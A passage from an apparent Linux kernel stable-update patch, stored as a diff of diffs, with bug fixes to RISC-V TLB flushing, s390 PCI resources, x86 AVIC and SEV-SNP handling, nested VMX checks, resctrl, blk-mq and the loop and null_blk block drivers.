+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
+-
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 80ce9caba8d22..0f784e3d307bb 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,16 +196,6 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
+-#ifdef CONFIG_SMP
+-	else {
+-		cpumask_t *mask = &mm->context.tlb_stale_mask;
+-
+-		if (cpumask_test_cpu(cpu, mask)) {
+-			cpumask_clear_cpu(cpu, mask);
+-			local_flush_tlb_all_asid(cntx & asid_mask);
+-		}
+-	}
+-#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+@@ -215,12 +205,24 @@ static void set_mm_noasid(struct mm_struct *mm)
+ 	local_flush_tlb_all();
+ }
+ 
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+-	if (static_branch_unlikely(&use_asid_allocator))
+-		set_mm_asid(mm, cpu);
+-	else
+-		set_mm_noasid(mm);
++	/*
++	 * The mm_cpumask indicates which harts' TLBs contain the virtual
++	 * address mapping of the mm. Compared to noasid, using asid
++	 * can't guarantee that stale TLB entries are invalidated because
++	 * the asid mechanism wouldn't flush TLB for every switch_mm for
++	 * performance. So when using asid, keep all CPUs footmarks in
++	 * cpumask() until mm reset.
++	 */
++	cpumask_set_cpu(cpu, mm_cpumask(next));
++	if (static_branch_unlikely(&use_asid_allocator)) {
++		set_mm_asid(next, cpu);
++	} else {
++		cpumask_clear_cpu(cpu, mm_cpumask(prev));
++		set_mm_noasid(next);
++	}
+ }
+ 
+ static int __init asids_init(void)
+@@ -274,7 +276,8 @@ static int __init asids_init(void)
+ }
+ early_initcall(asids_init);
+ #else
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+ 	/* Nothing to do here when there is no MMU */
+ }
+@@ -327,10 +330,7 @@ void switch_mm(struct mm_struct *prev, struct mm_struct *next,
+ 	 */
+ 	cpu = smp_processor_id();
+ 
+-	cpumask_clear_cpu(cpu, mm_cpumask(prev));
+-	cpumask_set_cpu(cpu, mm_cpumask(next));
+-
+-	set_mm(next, cpu);
++	set_mm(prev, next, cpu);
+ 
+ 	flush_icache_deferred(next, cpu);
+ }
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index ce7dfc81bb3fe..37ed760d007c3 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,7 +5,23 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-#include <asm/tlbflush.h>
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
+ 
+ void flush_tlb_all(void)
+ {
+@@ -15,7 +31,6 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
+-	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
+ 	bool broadcast;
+@@ -29,15 +44,6 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
+-		/*
+-		 * TLB will be immediately flushed on harts concurrently
+-		 * executing this MM context. TLB flush on other harts
+-		 * is deferred until this MM context migrates there.
+-		 */
+-		cpumask_setall(pmask);
+-		cpumask_clear_cpu(cpuid, pmask);
+-		cpumask_andnot(pmask, pmask, cmask);
+-
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+ 		} else if (size <= stride) {
+diff --git a/arch/s390/boot/ipl_report.c b/arch/s390/boot/ipl_report.c
+index 9b14045065b6e..74b5cd2648622 100644
+--- a/arch/s390/boot/ipl_report.c
++++ b/arch/s390/boot/ipl_report.c
+@@ -57,11 +57,19 @@ repeat:
+ 	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+ 	    intersects(initrd_data.start, initrd_data.size, safe_addr, size))
+ 		safe_addr = initrd_data.start + initrd_data.size;
++	if (intersects(safe_addr, size, (unsigned long)comps, comps->len)) {
++		safe_addr = (unsigned long)comps + comps->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(comp, comps)
+ 		if (intersects(safe_addr, size, comp->addr, comp->len)) {
+ 			safe_addr = comp->addr + comp->len;
+ 			goto repeat;
+ 		}
++	if (intersects(safe_addr, size, (unsigned long)certs, certs->len)) {
++		safe_addr = (unsigned long)certs + certs->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(cert, certs)
+ 		if (intersects(safe_addr, size, cert->addr, cert->len)) {
+ 			safe_addr = cert->addr + cert->len;
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index 73cdc55393847..2c99f9552b2f5 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -544,8 +544,7 @@ static struct resource *__alloc_res(struct zpci_dev *zdev, unsigned long start,
+ 	return r;
+ }
+ 
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources)
++int zpci_setup_bus_resources(struct zpci_dev *zdev)
+ {
+ 	unsigned long addr, size, flags;
+ 	struct resource *res;
+@@ -581,7 +580,6 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 			return -ENOMEM;
+ 		}
+ 		zdev->bars[i].res = res;
+-		pci_add_resource(resources, res);
+ 	}
+ 	zdev->has_resources = 1;
+ 
+@@ -590,17 +588,23 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 
+ static void zpci_cleanup_bus_resources(struct zpci_dev *zdev)
+ {
++	struct resource *res;
+ 	int i;
+ 
++	pci_lock_rescan_remove();
+ 	for (i = 0; i < PCI_STD_NUM_BARS; i++) {
+-		if (!zdev->bars[i].size || !zdev->bars[i].res)
++		res = zdev->bars[i].res;
++		if (!res)
+ 			continue;
+ 
++		release_resource(res);
++		pci_bus_remove_resource(zdev->zbus->bus, res);
+ 		zpci_free_iomap(zdev, zdev->bars[i].map_idx);
+-		release_resource(zdev->bars[i].res);
+-		kfree(zdev->bars[i].res);
++		zdev->bars[i].res = NULL;
++		kfree(res);
+ 	}
+ 	zdev->has_resources = 0;
++	pci_unlock_rescan_remove();
+ }
+ 
+ int pcibios_device_add(struct pci_dev *pdev)
+diff --git a/arch/s390/pci/pci_bus.c b/arch/s390/pci/pci_bus.c
+index 6a8da1b742ae5..a99926af2b69a 100644
+--- a/arch/s390/pci/pci_bus.c
++++ b/arch/s390/pci/pci_bus.c
+@@ -41,9 +41,7 @@ static int zpci_nb_devices;
+  */
+ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ {
+-	struct resource_entry *window, *n;
+-	struct resource *res;
+-	int rc;
++	int rc, i;
+ 
+ 	if (!zdev_enabled(zdev)) {
+ 		rc = zpci_enable_device(zdev);
+@@ -57,10 +55,10 @@ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ 	}
+ 
+ 	if (!zdev->has_resources) {
+-		zpci_setup_bus_resources(zdev, &zdev->zbus->resources);
+-		resource_list_for_each_entry_safe(window, n, &zdev->zbus->resources) {
+-			res = window->res;
+-			pci_bus_add_resource(zdev->zbus->bus, res, 0);
++		zpci_setup_bus_resources(zdev);
++		for (i = 0; i < PCI_STD_NUM_BARS; i++) {
++			if (zdev->bars[i].res)
++				pci_bus_add_resource(zdev->zbus->bus, zdev->bars[i].res, 0);
+ 		}
+ 	}
+ 
+diff --git a/arch/s390/pci/pci_bus.h b/arch/s390/pci/pci_bus.h
+index e96c9860e0644..af9f0ac79a1b1 100644
+--- a/arch/s390/pci/pci_bus.h
++++ b/arch/s390/pci/pci_bus.h
+@@ -30,8 +30,7 @@ static inline void zpci_zdev_get(struct zpci_dev *zdev)
+ 
+ int zpci_alloc_domain(int domain);
+ void zpci_free_domain(int domain);
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources);
++int zpci_setup_bus_resources(struct zpci_dev *zdev);
+ 
+ static inline struct zpci_dev *zdev_from_bus(struct pci_bus *bus,
+ 					     unsigned int devfn)
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index b3c1ae084180d..d2e95d1d4db77 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -1,6 +1,12 @@
+ # SPDX-License-Identifier: GPL-2.0
+ core-y += arch/x86/crypto/
+ 
++#
++# Disable SSE and other FP/SIMD instructions to match normal x86
++#
++KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
++KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+ 
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b8357d6ecd47e..b63be696b776a 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,8 +128,9 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error code */
++/* Guest message request error codes */
+ #define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
++#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+ 
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 0361626841bc0..236fda748ae96 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -256,20 +256,22 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
+ };
+ 
+-#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(9, 0)
++#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+ 
+ /*
+- * For AVIC, the max index allowed for physical APIC ID
+- * table is 0xff (255).
++ * For AVIC, the max index allowed for physical APIC ID table is 0xfe (254), as
++ * 0xff is a broadcast to all CPUs, i.e. can't be targeted individually.
+  */
+ #define AVIC_MAX_PHYSICAL_ID		0XFEULL
+ 
+ /*
+- * For x2AVIC, the max index allowed for physical APIC ID
+- * table is 0x1ff (511).
++ * For x2AVIC, the max index allowed for physical APIC ID table is 0x1ff (511).
+  */
+ #define X2AVIC_MAX_PHYSICAL_ID		0x1FFUL
+ 
++static_assert((AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == AVIC_MAX_PHYSICAL_ID);
++static_assert((X2AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == X2AVIC_MAX_PHYSICAL_ID);
++
+ #define AVIC_HPA_MASK	~((0xFFFULL << 52) | 0xFFF)
+ #define VMCB_AVIC_APIC_BAR_MASK		0xFFFFFFFFFF000ULL
+ 
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index 2c8ec5c717121..e228d58ee2645 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2365,6 +2365,7 @@ static void mce_restart(void)
+ {
+ 	mce_timer_delete_all();
+ 	on_each_cpu(mce_cpu_restart, NULL, 1);
++	mce_schedule_work();
+ }
+ 
+ /* Toggle features for corrected errors */
+diff --git a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+index 1dafbdc5ac316..84f23327caed4 100644
+--- a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
++++ b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+@@ -374,7 +374,6 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdtgroup *rdtgrp;
+-	struct rdt_domain *dom;
+ 	struct rdt_resource *r;
+ 	char *tok, *resname;
+ 	int ret = 0;
+@@ -403,10 +402,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 		goto out;
+ 	}
+ 
+-	list_for_each_entry(s, &resctrl_schema_all, list) {
+-		list_for_each_entry(dom, &s->res->domains, list)
+-			memset(dom->staged_config, 0, sizeof(dom->staged_config));
+-	}
++	rdt_staged_configs_clear();
+ 
+ 	while ((tok = strsep(&buf, "\n")) != NULL) {
+ 		resname = strim(strsep(&tok, ":"));
+@@ -451,6 +447,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 	}
+ 
+ out:
++	rdt_staged_configs_clear();
+ 	rdtgroup_kn_unlock(of->kn);
+ 	cpus_read_unlock();
+ 	return ret ?: nbytes;
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 5f7128686cfd2..0b5c6c76f6f7b 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -537,5 +537,6 @@ bool has_busy_rmid(struct rdt_resource *r, struct rdt_domain *d);
+ void __check_limbo(struct rdt_domain *d, bool force_free);
+ void rdt_domain_reconfigure_cdp(struct rdt_resource *r);
+ void __init thread_throttle_mode_init(void);
++void rdt_staged_configs_clear(void);
+ 
+ #endif /* _ASM_X86_RESCTRL_INTERNAL_H */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 87b670d540b84..c7f1c7cb1963b 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -78,6 +78,19 @@ void rdt_last_cmd_printf(const char *fmt, ...)
+ 	va_end(ap);
+ }
+ 
++void rdt_staged_configs_clear(void)
++{
++	struct rdt_resource *r;
++	struct rdt_domain *dom;
++
++	lockdep_assert_held(&rdtgroup_mutex);
++
++	for_each_alloc_capable_rdt_resource(r) {
++		list_for_each_entry(dom, &r->domains, list)
++			memset(dom->staged_config, 0, sizeof(dom->staged_config));
++	}
++}
++
+ /*
+  * Trivial allocator for CLOSIDs. Since h/w only supports a small number,
+  * we can keep a bitmap of free CLOSIDs in a single integer.
+@@ -2851,7 +2864,9 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdt_resource *r;
+-	int ret;
++	int ret = 0;
++
++	rdt_staged_configs_clear();
+ 
+ 	list_for_each_entry(s, &resctrl_schema_all, list) {
+ 		r = s->res;
+@@ -2862,20 +2877,22 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ 		} else {
+ 			ret = rdtgroup_init_cat(s, rdtgrp->closid);
+ 			if (ret < 0)
+-				return ret;
++				goto out;
+ 		}
+ 
+ 		ret = resctrl_arch_update_domains(r, rdtgrp->closid);
+ 		if (ret < 0) {
+ 			rdt_last_cmd_puts("Failed to initialize allocations\n");
+-			return ret;
++			goto out;
+ 		}
+ 
+ 	}
+ 
+ 	rdtgrp->mode = RDT_MODE_SHAREABLE;
+ 
+-	return 0;
++out:
++	rdt_staged_configs_clear();
++	return ret;
+ }
+ 
+ static int mkdir_rdt_prepare(struct kernfs_node *parent_kn,
+diff --git a/arch/x86/kernel/ftrace_64.S b/arch/x86/kernel/ftrace_64.S
+index 2a4be92fd1444..6233c5b4c10b2 100644
+--- a/arch/x86/kernel/ftrace_64.S
++++ b/arch/x86/kernel/ftrace_64.S
+@@ -134,9 +134,11 @@ SYM_TYPED_FUNC_START(ftrace_stub)
+ 	RET
+ SYM_FUNC_END(ftrace_stub)
+ 
++#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ SYM_TYPED_FUNC_START(ftrace_stub_graph)
+ 	RET
+ SYM_FUNC_END(ftrace_stub_graph)
++#endif
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index a428c62330d37..c680ac6342bb3 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -2183,9 +2183,6 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+-		return -ENODEV;
+-
+ 	if (!fw_err)
+ 		return -EINVAL;
+ 
+@@ -2212,15 +2209,26 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	if (ghcb->save.sw_exit_info_2) {
+-		/* Number of expected pages are returned in RBX */
+-		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-		    ghcb->save.sw_exit_info_2 == SNP_GUEST_REQ_INVALID_LEN)
+-			input->data_npages = ghcb_get_rbx(ghcb);
++	*fw_err = ghcb->save.sw_exit_info_2;
++	switch (*fw_err) {
++	case 0:
++		break;
+ 
+-		*fw_err = ghcb->save.sw_exit_info_2;
++	case SNP_GUEST_REQ_ERR_BUSY:
++		ret = -EAGAIN;
++		break;
+ 
++	case SNP_GUEST_REQ_INVALID_LEN:
++		/* Number of expected pages are returned in RBX */
++		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
++			input->data_npages = ghcb_get_rbx(ghcb);
++			ret = -ENOSPC;
++			break;
++		}
++		fallthrough;
++	default:
+ 		ret = -EIO;
++		break;
+ 	}
+ 
+ e_put:
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 97ad0661f9639..e910ec5a0cc0b 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -27,19 +27,29 @@
+ #include "irq.h"
+ #include "svm.h"
+ 
+-/* AVIC GATAG is encoded using VM and VCPU IDs */
+-#define AVIC_VCPU_ID_BITS		8
+-#define AVIC_VCPU_ID_MASK		((1 << AVIC_VCPU_ID_BITS) - 1)
++/*
++ * Encode the arbitrary VM ID and the vCPU's default APIC ID, i.e the vCPU ID,
++ * into the GATag so that KVM can retrieve the correct vCPU from a GALog entry
++ * if an interrupt can't be delivered, e.g. because the vCPU isn't running.
++ *
++ * For the vCPU ID, use however many bits are currently allowed for the max
++ * guest physical APIC ID (limited by the size of the physical ID table), and
++ * use whatever bits remain to assign arbitrary AVIC IDs to VMs.  Note, the
++ * size of the GATag is defined by hardware (32 bits), but is an opaque value
++ * as far as hardware is concerned.
++ */
++#define AVIC_VCPU_ID_MASK		AVIC_PHYSICAL_MAX_INDEX_MASK
+ 
+-#define AVIC_VM_ID_BITS			24
+-#define AVIC_VM_ID_NR			(1 << AVIC_VM_ID_BITS)
+-#define AVIC_VM_ID_MASK			((1 << AVIC_VM_ID_BITS) - 1)
++#define AVIC_VM_ID_SHIFT		HWEIGHT32(AVIC_PHYSICAL_MAX_INDEX_MASK)
++#define AVIC_VM_ID_MASK			(GENMASK(31, AVIC_VM_ID_SHIFT) >> AVIC_VM_ID_SHIFT)
+ 
+-#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VCPU_ID_BITS) | \
++#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VM_ID_SHIFT) | \
+ 						(y & AVIC_VCPU_ID_MASK))
+-#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VCPU_ID_BITS) & AVIC_VM_ID_MASK)
++#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VM_ID_SHIFT) & AVIC_VM_ID_MASK)
+ #define AVIC_GATAG_TO_VCPUID(x)		(x & AVIC_VCPU_ID_MASK)
+ 
++static_assert(AVIC_GATAG(AVIC_VM_ID_MASK, AVIC_VCPU_ID_MASK) == -1u);
++
+ static bool force_avic;
+ module_param_unsafe(force_avic, bool, 0444);
+ 
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index df8995977ec2d..1d00f7824da1e 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -2999,7 +2999,7 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					struct vmcs12 *vmcs12,
+ 					enum vm_entry_failure_code *entry_failure_code)
+ {
+-	bool ia32e;
++	bool ia32e = !!(vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE);
+ 
+ 	*entry_failure_code = ENTRY_FAIL_DEFAULT;
+ 
+@@ -3025,6 +3025,13 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					   vmcs12->guest_ia32_perf_global_ctrl)))
+ 		return -EINVAL;
+ 
++	if (CC((vmcs12->guest_cr0 & (X86_CR0_PG | X86_CR0_PE)) == X86_CR0_PG))
++		return -EINVAL;
++
++	if (CC(ia32e && !(vmcs12->guest_cr4 & X86_CR4_PAE)) ||
++	    CC(ia32e && !(vmcs12->guest_cr0 & X86_CR0_PG)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the load IA32_EFER VM-entry control is 1, the following checks
+ 	 * are performed on the field for the IA32_EFER MSR:
+@@ -3036,7 +3043,6 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 	 */
+ 	if (to_vmx(vcpu)->nested.nested_run_pending &&
+ 	    (vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_EFER)) {
+-		ia32e = (vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE) != 0;
+ 		if (CC(!kvm_valid_efer(vcpu, vmcs12->guest_ia32_efer)) ||
+ 		    CC(ia32e != !!(vmcs12->guest_ia32_efer & EFER_LMA)) ||
+ 		    CC(((vmcs12->guest_cr0 & X86_CR0_PG) &&
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index f415498d3175c..d94ebd8acdfde 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -600,7 +600,8 @@ void __init sme_enable(struct boot_params *bp)
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer));
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
++		return;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index fe0a3a882f465..aa67a52c5a069 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2711,6 +2711,7 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 	struct blk_mq_hw_ctx *this_hctx = NULL;
+ 	struct blk_mq_ctx *this_ctx = NULL;
+ 	struct request *requeue_list = NULL;
++	struct request **requeue_lastp = &requeue_list;
+ 	unsigned int depth = 0;
+ 	LIST_HEAD(list);
+ 
+@@ -2721,10 +2722,10 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 			this_hctx = rq->mq_hctx;
+ 			this_ctx = rq->mq_ctx;
+ 		} else if (this_hctx != rq->mq_hctx || this_ctx != rq->mq_ctx) {
+-			rq_list_add(&requeue_list, rq);
++			rq_list_add_tail(&requeue_lastp, rq);
+ 			continue;
+ 		}
+-		list_add_tail(&rq->queuelist, &list);
++		list_add(&rq->queuelist, &list);
+ 		depth++;
+ 	} while (!rq_list_empty(plug->mq_list));
+ 
+diff --git a/drivers/acpi/pptt.c b/drivers/acpi/pptt.c
+index c91342dcbcd63..ced3eb15bd8b7 100644
+--- a/drivers/acpi/pptt.c
++++ b/drivers/acpi/pptt.c
+@@ -537,16 +537,19 @@ static int topology_get_acpi_cpu_tag(struct acpi_table_header *table,
+ static struct acpi_table_header *acpi_get_pptt(void)
+ {
+ 	static struct acpi_table_header *pptt;
++	static bool is_pptt_checked;
+ 	acpi_status status;
+ 
+ 	/*
+ 	 * PPTT will be used at runtime on every CPU hotplug in path, so we
+ 	 * don't need to call acpi_put_table() to release the table mapping.
+ 	 */
+-	if (!pptt) {
++	if (!pptt && !is_pptt_checked) {
+ 		status = acpi_get_table(ACPI_SIG_PPTT, 0, &pptt);
+ 		if (ACPI_FAILURE(status))
+ 			acpi_pptt_warn_missing();
++
++		is_pptt_checked = true;
+ 	}
+ 
+ 	return pptt;
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 981464e561df1..793ae876918ce 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1853,35 +1853,44 @@ static blk_status_t loop_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 
+ static void loop_handle_cmd(struct loop_cmd *cmd)
+ {
++	struct cgroup_subsys_state *cmd_blkcg_css = cmd->blkcg_css;
++	struct cgroup_subsys_state *cmd_memcg_css = cmd->memcg_css;
+ 	struct request *rq = blk_mq_rq_from_pdu(cmd);
+ 	const bool write = op_is_write(req_op(rq));
+ 	struct loop_device *lo = rq->q->queuedata;
+ 	int ret = 0;
+ 	struct mem_cgroup *old_memcg = NULL;
++	const bool use_aio = cmd->use_aio;
+ 
+ 	if (write && (lo->lo_flags & LO_FLAGS_READ_ONLY)) {
+ 		ret = -EIO;
+ 		goto failed;
+ 	}
+ 
+-	if (cmd->blkcg_css)
+-		kthread_associate_blkcg(cmd->blkcg_css);
+-	if (cmd->memcg_css)
++	if (cmd_blkcg_css)
++		kthread_associate_blkcg(cmd_blkcg_css);
++	if (cmd_memcg_css)
+ 		old_memcg = set_active_memcg(
+-			mem_cgroup_from_css(cmd->memcg_css));
++			mem_cgroup_from_css(cmd_memcg_css));
+ 
++	/*
++	 * do_req_filebacked() may call blk_mq_complete_request() synchronously
++	 * or asynchronously if using aio. Hence, do not touch 'cmd' after
++	 * do_req_filebacked() has returned unless we are sure that 'cmd' has
++	 * not yet been completed.
++	 */
+ 	ret = do_req_filebacked(lo, rq);
+ 
+-	if (cmd->blkcg_css)
++	if (cmd_blkcg_css)
+ 		kthread_associate_blkcg(NULL);
+ 
+-	if (cmd->memcg_css) {
++	if (cmd_memcg_css) {
+ 		set_active_memcg(old_memcg);
+-		css_put(cmd->memcg_css);
++		css_put(cmd_memcg_css);
+ 	}
+  failed:
+ 	/* complete non-aio request */
+-	if (!cmd->use_aio || ret) {
++	if (!use_aio || ret) {
+ 		if (ret == -EOPNOTSUPP)
+ 			cmd->ret = ret;
+ 		else
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 1f154f92f4c27..af419af9a0f4a 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1393,8 +1393,7 @@ static inline void nullb_complete_cmd(struct nullb_cmd *cmd)
+ 	case NULL_IRQ_SOFTIRQ:
+ 		switch (cmd->nq->dev->queue_mode) {
+ 		case NULL_Q_MQ:
+-			if (likely(!blk_should_fake_timeout(cmd->rq->q)))
+-				blk_mq_complete_request(cmd->rq);
++			blk_mq_complete_request(cmd->rq);
+ 			break;
+ 		case NULL_Q_BIO:
+ 			/*
+@@ -1655,7 +1654,8 @@ static blk_status_t null_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 	cmd->rq = bd->rq;
+ 	cmd->error = BLK_STS_OK;
+ 	cmd->nq = nq;
+-	cmd->fake_timeout = should_timeout_request(bd->rq);
++	cmd->fake_timeout = should_timeout_request(bd->rq) ||
++		blk_should_fake_timeout(bd->rq->q);
+ 
+ 	blk_mq_start_request(bd->rq);
+ 
+diff --git a/drivers/block/sunvdc.c b/drivers/block/sunvdc.c
+index fb855da971ee7..9fa821fa76b07 100644
+--- a/drivers/block/sunvdc.c
++++ b/drivers/block/sunvdc.c
+@@ -972,6 +972,8 @@ static int vdc_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 	print_version();
+ 
+ 	hp = mdesc_grab();
++	if (!hp)
++		return -ENODEV;
+ 
+ 	err = -ENODEV;
+ 	if ((vdev->dev_no << PARTITION_SHIFT) & ~(u64)MINORMASK) {
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index d79905f3e1744..5da82f2bdd211 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -92,7 +92,7 @@ config COMMON_CLK_RK808
+ config COMMON_CLK_HI655X
+ 	tristate "Clock driver for Hi655x" if EXPERT
